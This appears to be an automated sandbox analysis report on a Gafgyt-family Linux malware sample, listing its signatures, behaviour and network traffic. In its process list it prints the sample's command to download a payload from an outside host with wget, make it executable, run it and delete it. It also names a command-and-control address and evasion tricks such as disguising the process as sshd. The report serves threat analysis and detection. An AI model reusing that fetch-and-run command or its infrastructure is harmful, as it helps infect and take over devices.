Analysis Overview
SHA256
8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95
Threat Level: Known bad
The file 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Modifies Watchdog functionality
Changes its process name
Executes dropped EXE
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-04-02 01:15
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted: 2024-04-02 01:15
Reported: 2024-04-02 01:18
Platform: debian9-armhf-20240226-en
Max time kernel: 148s
Max time network: 141s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
[/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| MD | 85.239.33.129:666 | | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |